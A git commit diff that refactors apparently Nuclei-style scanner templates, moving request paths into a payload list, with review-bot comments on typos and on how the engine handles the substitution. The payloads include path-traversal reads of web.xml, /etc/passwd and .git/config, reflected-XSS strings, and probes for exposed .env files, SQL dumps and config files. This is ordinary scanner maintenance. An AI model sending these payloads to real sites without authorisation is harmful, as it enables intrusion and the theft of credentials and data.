feat: convert paths with lots of elements to payloads

patch-1
Ice3man 2024-04-12 16:01:51 +05:30
parent 1dd3635124
commit a63774c77e
35 changed files with 939 additions and 834 deletions


@ -30,16 +30,19 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." payloads:
- "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF" paths:
- "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF" - "/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF" - "/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF" - "/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." - "/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
- "/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
- "/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
stop-at-first-match: true stop-at-first-match: true


@ -34,17 +34,20 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd" payloads:
- "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" paths:
- "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" - "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
- "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
stop-at-first-match: true stop-at-first-match: true


@ -32,14 +32,17 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/cgi-bin/status" payloads:
- "{{BaseURL}}/cgi-bin/stats" paths:
- "{{BaseURL}}/cgi-bin/test" - ""
- "{{BaseURL}}/cgi-bin/status/status.cgi" - "/cgi-bin/status"
- "{{BaseURL}}/test.cgi" - "/cgi-bin/stats"
- "{{BaseURL}}/debug.cgi" - "/cgi-bin/test"
- "{{BaseURL}}/cgi-bin/test-cgi" - "/cgi-bin/status/status.cgi"
- "/test.cgi"
- "/debug.cgi"
- "/cgi-bin/test-cgi"
stop-at-first-match: true stop-at-first-match: true
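Review bot: The first payload value is the empty string `- ""`, which now stands in for the old bare `"{{BaseURL}}"` request. It is worth confirming that the engine keeps empty payload values rather than skipping them, because otherwise the root-path check disappears without any error. The same pattern appears in the phpMyAdmin section (`@ -19,19 +19,22 @@`). A comment above the entry, such as `# empty value requests the base URL itself`, would make the intent clear to the next editor.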


@ -32,15 +32,18 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" payloads:
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" paths:
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" - "/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
stop-at-first-match: true stop-at-first-match: true
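Review bot: The `readd.php` payload still begins with `/libs/libs/bower/` while every sibling entry begins with `/libs/bower/`. The doubled segment was copied unchanged from the old list and looks like a typo, in which case that check never reaches the intended file. If it is unintentional, the prefix should be `/libs/bower/bower_components/yui2/sandbox/treeview/readd.php` with the same query string as the other entries. If it is deliberate, a short comment saying so would keep a later cleanup from removing it.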


@ -33,17 +33,20 @@ info:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - "{{BaseURL}}{{paths}}"
- '{{BaseURL}}/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' payloads:
- '{{BaseURL}}/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' paths:
- '{{BaseURL}}/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1' - '/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '{{BaseURL}}/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E' - '/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
- '/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1'
- '/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
stop-at-first-match: true stop-at-first-match: true
matchers-condition: and matchers-condition: and
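Review bot: These payload values mix percent-encoded markup (`%3Cscript%3E`) with one `advanced-elements/form` entry that carries a raw double quote and raw angle brackets, and all of them now reach the request line through `{{paths}}` substitution instead of being literal paths. A before/after request dump should confirm that substitution sends each value byte-for-byte, with no second round of encoding or normalisation. The matchers are outside this hunk, but they presumably key on the reflected string, so a changed encoding would show up only as silent false negatives. The same check applies to the yui2 section (`@ -32,15 +32,18 @@`). On style, the path entry is now double-quoted while the payload entries stay single-quoted; a comment noting that the values contain `"` would explain the mix.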


@ -19,26 +19,29 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/openam/XUI" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/XUI" payloads:
- "{{BaseURL}}/XUI/#login" paths:
- "{{BaseURL}}/UI" - "/openam/XUI"
- "{{BaseURL}}/sso/XUI" - "/XUI"
- "{{BaseURL}}/sso/UI" - "/XUI/#login"
- "{{BaseURL}}/sso/UI/#login" - "/UI"
- "{{BaseURL}}/opensso/UI/Login" - "/sso/XUI"
- "{{BaseURL}}/openam/UI/login" - "/sso/UI"
- "{{BaseURL}}/openam/UI/#loginlogin" - "/sso/UI/#login"
- "{{BaseURL}}/openam/UI/Login" - "/opensso/UI/Login"
- "{{BaseURL}}/openam/XUI/Login" - "/openam/UI/login"
- "{{BaseURL}}/openam/XUI/login" - "/openam/UI/#loginlogin"
- "{{BaseURL}}/openam/XUI/#login" - "/openam/UI/Login"
- "{{BaseURL}}/am/UI/Login" - "/openam/XUI/Login"
- "{{BaseURL}}/am/UI/#login" - "/openam/XUI/login"
- "{{BaseURL}}/am/XUI/" - "/openam/XUI/#login"
- "{{BaseURL}}/am/XUI/Login" - "/am/UI/Login"
- "{{BaseURL}}/am/json/serverinfo/*" - "/am/UI/#login"
- "{{BaseURL}}/openam/json/serverinfo/*" - "/am/XUI/"
- "/am/XUI/Login"
- "/am/json/serverinfo/*"
- "/openam/json/serverinfo/*"
host-redirects: true host-redirects: true
stop-at-first-match: true stop-at-first-match: true
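Review bot: The payload `"/openam/UI/#loginlogin"` was carried over as-is and looks like a typo for `"/openam/UI/#login"`, matching the other `#login` entries in the list. The part after `#` is a URL fragment, so it is also worth checking whether the engine sends it at all; if it does not, the `#login` variants duplicate their base paths and only add requests per target. Both points predate this commit, but the lines are rewritten here, which makes this a cheap place to clean them up.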


@ -19,19 +19,22 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/phpmyadmin/" payloads:
- "{{BaseURL}}/admin/phpmyadmin/" paths:
- "{{BaseURL}}/_phpmyadmin/" - ""
- "{{BaseURL}}/administrator/components/com_joommyadmin/phpmyadmin/" - "/phpmyadmin/"
- "{{BaseURL}}/apache-default/phpmyadmin/" - "/admin/phpmyadmin/"
- "{{BaseURL}}/blog/phpmyadmin/" - "/_phpmyadmin/"
- "{{BaseURL}}/forum/phpmyadmin/" - "/administrator/components/com_joommyadmin/phpmyadmin/"
- "{{BaseURL}}/php/phpmyadmin/" - "/apache-default/phpmyadmin/"
- "{{BaseURL}}/typo3/phpmyadmin/" - "/blog/phpmyadmin/"
- "{{BaseURL}}/web/phpmyadmin/" - "/forum/phpmyadmin/"
- "{{BaseURL}}/xampp/phpmyadmin/" - "/php/phpmyadmin/"
- "{{BaseURL}}/phpMyAdmin/" - "/typo3/phpmyadmin/"
- "/web/phpmyadmin/"
- "/xampp/phpmyadmin/"
- "/phpMyAdmin/"
stop-at-first-match: true stop-at-first-match: true
matchers: matchers:


@ -18,23 +18,26 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/fckeditor/_samples/default.html" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/fckeditor/editor/filemanager/connectors/uploadtest.html" payloads:
- "{{BaseURL}}/ckeditor/samples/" paths:
- "{{BaseURL}}/editor/ckeditor/samples/" - "/fckeditor/_samples/default.html"
- "{{BaseURL}}/ckeditor/samples/sample_posteddata.php" - "/fckeditor/editor/filemanager/connectors/uploadtest.html"
- "{{BaseURL}}/editor/ckeditor/samples/sample_posteddata.php" - "/ckeditor/samples/"
- "{{BaseURL}}/fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php" - "/editor/ckeditor/samples/"
- "{{BaseURL}}/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php" - "/ckeditor/samples/sample_posteddata.php"
- "{{BaseURL}}/plugin/editor/smarteditor2/SmartEditor2Skin.html" - "/editor/ckeditor/samples/sample_posteddata.php"
- "{{BaseURL}}/js/se2/SmartEditor2.html" - "/fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"
- "{{BaseURL}}/nse/SmartEditor2.html" - "/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php"
- "{{BaseURL}}/SmartEditor2.html" - "/plugin/editor/smarteditor2/SmartEditor2Skin.html"
- "{{BaseURL}}/apps/ckeditor/samples/old/replacebyclass.html" - "/js/se2/SmartEditor2.html"
- "{{BaseURL}}/plugin/editor/ckeditor/samples/old/replacebyclass.html" - "/nse/SmartEditor2.html"
- "{{BaseURL}}/latest/samples/old/replacebyclass.html" - "/SmartEditor2.html"
- "{{BaseURL}}/Content/ckeditor/samples/old/replacebyclass.html" - "/apps/ckeditor/samples/old/replacebyclass.html"
- "{{BaseURL}}/ckeditor/samples/plugins/htmlwriter/outputhtml.html" - "/plugin/editor/ckeditor/samples/old/replacebyclass.html"
- "/latest/samples/old/replacebyclass.html"
- "/Content/ckeditor/samples/old/replacebyclass.html"
- "/ckeditor/samples/plugins/htmlwriter/outputhtml.html"
matchers: matchers:
- type: word - type: word
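Review bot: The payload ending in `server-scripts/spellcheckder.php` looks misspelled next to the `spellchecker.php` entry directly before it, so that probe likely never hits the intended file; if so it should end in `spellchecker.php`. No `stop-at-first-match: true` is visible between the payload list and `matchers:` in this hunk, unlike most other sections of the commit. The request block continues outside the hunk, so it may be set further down; if it is not, every target receives the full list even after a hit, and adding it would be worth considering.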


@ -18,65 +18,68 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/swagger-ui/swagger-ui.js" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/swagger/swagger-ui.js" payloads:
- "{{BaseURL}}/swagger-ui.js" paths:
- "{{BaseURL}}/swagger/ui/swagger-ui.js" - "/swagger-ui/swagger-ui.js"
- "{{BaseURL}}/swagger/ui/index" - "/swagger/swagger-ui.js"
- "{{BaseURL}}/swagger/index.html" - "/swagger-ui.js"
- "{{BaseURL}}/swagger-ui.html" - "/swagger/ui/swagger-ui.js"
- "{{BaseURL}}/swagger/swagger-ui.html" - "/swagger/ui/index"
- "{{BaseURL}}/api/swagger-ui.html" - "/swagger/index.html"
- "{{BaseURL}}/api-docs/swagger.json" - "/swagger-ui.html"
- "{{BaseURL}}/api-docs/swagger.yaml" - "/swagger/swagger-ui.html"
- "{{BaseURL}}/api_docs" - "/api/swagger-ui.html"
- "{{BaseURL}}/swagger.json" - "/api-docs/swagger.json"
- "{{BaseURL}}/swagger.yaml" - "/api-docs/swagger.yaml"
- "{{BaseURL}}/swagger/v1/swagger.json" - "/api_docs"
- "{{BaseURL}}/swagger/v1/swagger.yaml" - "/swagger.json"
- "{{BaseURL}}/api/index.html" - "/swagger.yaml"
- "{{BaseURL}}/api/doc" - "/swagger/v1/swagger.json"
- "{{BaseURL}}/api/docs/" - "/swagger/v1/swagger.yaml"
- "{{BaseURL}}/api/swagger.json" - "/api/index.html"
- "{{BaseURL}}/api/swagger.yaml" - "/api/doc"
- "{{BaseURL}}/api/swagger.yml" - "/api/docs/"
- "{{BaseURL}}/api/swagger/index.html" - "/api/swagger.json"
- "{{BaseURL}}/api/swagger/swagger-ui.html" - "/api/swagger.yaml"
- "{{BaseURL}}/api/api-docs/swagger.json" - "/api/swagger.yml"
- "{{BaseURL}}/api/api-docs/swagger.yaml" - "/api/swagger/index.html"
- "{{BaseURL}}/api/swagger-ui/swagger.json" - "/api/swagger/swagger-ui.html"
- "{{BaseURL}}/api/swagger-ui/swagger.yaml" - "/api/api-docs/swagger.json"
- "{{BaseURL}}/api/apidocs/swagger.json" - "/api/api-docs/swagger.yaml"
- "{{BaseURL}}/api/apidocs/swagger.yaml" - "/api/swagger-ui/swagger.json"
- "{{BaseURL}}/api/swagger-ui/api-docs" - "/api/swagger-ui/swagger.yaml"
- "{{BaseURL}}/api/doc.json" - "/api/apidocs/swagger.json"
- "{{BaseURL}}/api/api-docs" - "/api/apidocs/swagger.yaml"
- "{{BaseURL}}/api/apidocs" - "/api/swagger-ui/api-docs"
- "{{BaseURL}}/api/swagger" - "/api/doc.json"
- "{{BaseURL}}/api/swagger/static/index.html" - "/api/api-docs"
- "{{BaseURL}}/api/swagger-resources" - "/api/apidocs"
- "{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs" - "/api/swagger"
- "{{BaseURL}}/api/__swagger__/" - "/api/swagger/static/index.html"
- "{{BaseURL}}/api/_swagger_/" - "/api/swagger-resources"
- "{{BaseURL}}/api/spec/swagger.json" - "/api/swagger-resources/restservices/v2/api-docs"
- "{{BaseURL}}/api/spec/swagger.yaml" - "/api/__swagger__/"
- "{{BaseURL}}/api/swagger/ui/index" - "/api/_swagger_/"
- "{{BaseURL}}/__swagger__/" - "/api/spec/swagger.json"
- "{{BaseURL}}/_swagger_/" - "/api/spec/swagger.yaml"
- "{{BaseURL}}/api/v1/swagger-ui/swagger.json" - "/api/swagger/ui/index"
- "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml" - "/__swagger__/"
- "{{BaseURL}}/swagger-resources/restservices/v2/api-docs" - "/_swagger_/"
- "{{BaseURL}}/api/swagger_doc.json" - "/api/v1/swagger-ui/swagger.json"
- "{{BaseURL}}/docu" - "/api/v1/swagger-ui/swagger.yaml"
- "{{BaseURL}}/docs" - "/swagger-resources/restservices/v2/api-docs"
- "{{BaseURL}}/swagger" - "/api/swagger_doc.json"
- "{{BaseURL}}/api-doc" - "/docu"
- "{{BaseURL}}/doc/" - "/docs"
- "{{BaseURL}}/swagger-ui/springfox.js" - "/swagger"
- "{{BaseURL}}/swagger-ui/swagger-ui-standalone-preset.js" - "/api-doc"
- "{{BaseURL}}/swagger-ui/swagger-ui/swagger-ui-bundle.js" - "/doc/"
- "{{BaseURL}}/webjars/swagger-ui/swagger-ui-bundle.js" - "/swagger-ui/springfox.js"
- "{{BaseURL}}/webjars/swagger-ui/index.html" - "/swagger-ui/swagger-ui-standalone-preset.js"
- "/swagger-ui/swagger-ui/swagger-ui-bundle.js"
- "/webjars/swagger-ui/swagger-ui-bundle.js"
- "/webjars/swagger-ui/index.html"
headers: headers:
Accept: text/html Accept: text/html


@ -16,27 +16,30 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/1.sql" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/backup.sql" payloads:
- "{{BaseURL}}/database.sql" paths:
- "{{BaseURL}}/data.sql" - "/1.sql"
- "{{BaseURL}}/db_backup.sql" - "/backup.sql"
- "{{BaseURL}}/dbdump.sql" - "/database.sql"
- "{{BaseURL}}/db.sql" - "/data.sql"
- "{{BaseURL}}/dump.sql" - "/db_backup.sql"
- "{{BaseURL}}/{{Hostname}}.sql" - "/dbdump.sql"
- "{{BaseURL}}/{{Hostname}}_db.sql" - "/db.sql"
- "{{BaseURL}}/localhost.sql" - "/dump.sql"
- "{{BaseURL}}/mysqldump.sql" - "/{{Hostname}}.sql"
- "{{BaseURL}}/mysql.sql" - "/{{Hostname}}_db.sql"
- "{{BaseURL}}/site.sql" - "/localhost.sql"
- "{{BaseURL}}/sql.sql" - "/mysqldump.sql"
- "{{BaseURL}}/temp.sql" - "/mysql.sql"
- "{{BaseURL}}/translate.sql" - "/site.sql"
- "{{BaseURL}}/users.sql" - "/sql.sql"
- "{{BaseURL}}/www.sql" - "/temp.sql"
- "{{BaseURL}}/wp-content/uploads/dump.sql" - "/translate.sql"
- "{{BaseURL}}/wp-content/mysql.sql" - "/users.sql"
- "/www.sql"
- "/wp-content/uploads/dump.sql"
- "/wp-content/mysql.sql"
headers: headers:
Range: "bytes=0-3000" Range: "bytes=0-3000"
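Review bot: Two payload values, `"/{{Hostname}}.sql"` and `"/{{Hostname}}_db.sql"`, contain a template variable that previously sat directly in `path`. It should be confirmed that variables nested inside payload values are still evaluated; otherwise the request goes out with a literal `{{Hostname}}` and the host-named checks stop working without any error. The same applies to `{{DN}}` and `{{SD}}` in the second .env section (`@ -20,28 +20,31 @@`) and to `{{Hostname}}`, `{{Host}}` and `{{RDN}}` in the private-key section (`@ -16,51 +16,54 @@`). Running one of these templates against a local test server and asserting on the requested path would settle it.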


@ -12,18 +12,21 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/.env" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/.env.dev.local" payloads:
- "{{BaseURL}}/.env.development.local" paths:
- "{{BaseURL}}/.env.prod.local" - "/.env"
- "{{BaseURL}}/.env.production.local" - "/.env.dev.local"
- "{{BaseURL}}/.env.local" - "/.env.development.local"
- "{{BaseURL}}/.env.example" - "/.env.prod.local"
- "{{BaseURL}}/.env.stage" - "/.env.production.local"
- "{{BaseURL}}/.env.live" - "/.env.local"
- "{{BaseURL}}/.env_1" - "/.env.example"
- "{{BaseURL}}/.env.old" - "/.env.stage"
- "{{BaseURL}}/.env_sample" - "/.env.live"
- "/.env_1"
- "/.env.old"
- "/.env_sample"
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -18,18 +18,21 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/deployment.ini" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/deploy.ini" payloads:
- "{{BaseURL}}/production.ini" paths:
- "{{BaseURL}}/prod.ini" - "/deployment.ini"
- "{{BaseURL}}/deployment.production.ini" - "/deploy.ini"
- "{{BaseURL}}/deployment.prod.ini" - "/production.ini"
- "{{BaseURL}}/deploy.production.ini" - "/prod.ini"
- "{{BaseURL}}/deploy.prod.ini" - "/deployment.production.ini"
- "{{BaseURL}}/server.ini" - "/deployment.prod.ini"
- "{{BaseURL}}/ftp.ini" - "/deploy.production.ini"
- "{{BaseURL}}/ftps.ini" - "/deploy.prod.ini"
- "{{BaseURL}}/sftp.ini" - "/server.ini"
- "/ftp.ini"
- "/ftps.ini"
- "/sftp.ini"
stop-at-first-match: true stop-at-first-match: true


@ -20,16 +20,19 @@ info:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/static../.git/config' - "{{BaseURL}}{{paths}}"
- '{{BaseURL}}/js../.git/config' payloads:
- '{{BaseURL}}/images../.git/config' paths:
- '{{BaseURL}}/img../.git/config' - '/static../.git/config'
- '{{BaseURL}}/css../.git/config' - '/js../.git/config'
- '{{BaseURL}}/assets../.git/config' - '/images../.git/config'
- '{{BaseURL}}/content../.git/config' - '/img../.git/config'
- '{{BaseURL}}/events../.git/config' - '/css../.git/config'
- '{{BaseURL}}/media../.git/config' - '/assets../.git/config'
- '{{BaseURL}}/lib../.git/config' - '/content../.git/config'
- '/events../.git/config'
- '/media../.git/config'
- '/lib../.git/config'
stop-at-first-match: true stop-at-first-match: true
matchers: matchers:


@ -14,33 +14,36 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/.github/workflows/ci.yml" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/.github/workflows/ci.yaml" payloads:
- "{{BaseURL}}/.github/workflows/CI.yml" paths:
- "{{BaseURL}}/.github/workflows/main.yml" - "/.github/workflows/ci.yml"
- "{{BaseURL}}/.github/workflows/main.yaml" - "/.github/workflows/ci.yaml"
- "{{BaseURL}}/.github/workflows/build.yml" - "/.github/workflows/CI.yml"
- "{{BaseURL}}/.github/workflows/build.yaml" - "/.github/workflows/main.yml"
- "{{BaseURL}}/.github/workflows/test.yml" - "/.github/workflows/main.yaml"
- "{{BaseURL}}/.github/workflows/test.yaml" - "/.github/workflows/build.yml"
- "{{BaseURL}}/.github/workflows/tests.yml" - "/.github/workflows/build.yaml"
- "{{BaseURL}}/.github/workflows/tests.yaml" - "/.github/workflows/test.yml"
- "{{BaseURL}}/.github/workflows/release.yml" - "/.github/workflows/test.yaml"
- "{{BaseURL}}/.github/workflows/publish.yml" - "/.github/workflows/tests.yml"
- "{{BaseURL}}/.github/workflows/deploy.yml" - "/.github/workflows/tests.yaml"
- "{{BaseURL}}/.github/workflows/push.yml" - "/.github/workflows/release.yml"
- "{{BaseURL}}/.github/workflows/lint.yml" - "/.github/workflows/publish.yml"
- "{{BaseURL}}/.github/workflows/coverage.yml" - "/.github/workflows/deploy.yml"
- "{{BaseURL}}/.github/workflows/release.yaml" - "/.github/workflows/push.yml"
- "{{BaseURL}}/.github/workflows/pr.yml" - "/.github/workflows/lint.yml"
- "{{BaseURL}}/.github/workflows/automerge.yml" - "/.github/workflows/coverage.yml"
